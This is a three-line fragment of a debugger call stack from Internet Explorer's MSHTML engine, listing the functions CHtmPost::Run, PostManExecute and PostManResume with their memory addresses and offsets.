6da308a8 MSHTML!CHtmPost::Run+0x003d
6da3080e MSHTML!PostManExecute+0x0061
6da2727c MSHTML!PostManResume+0x007b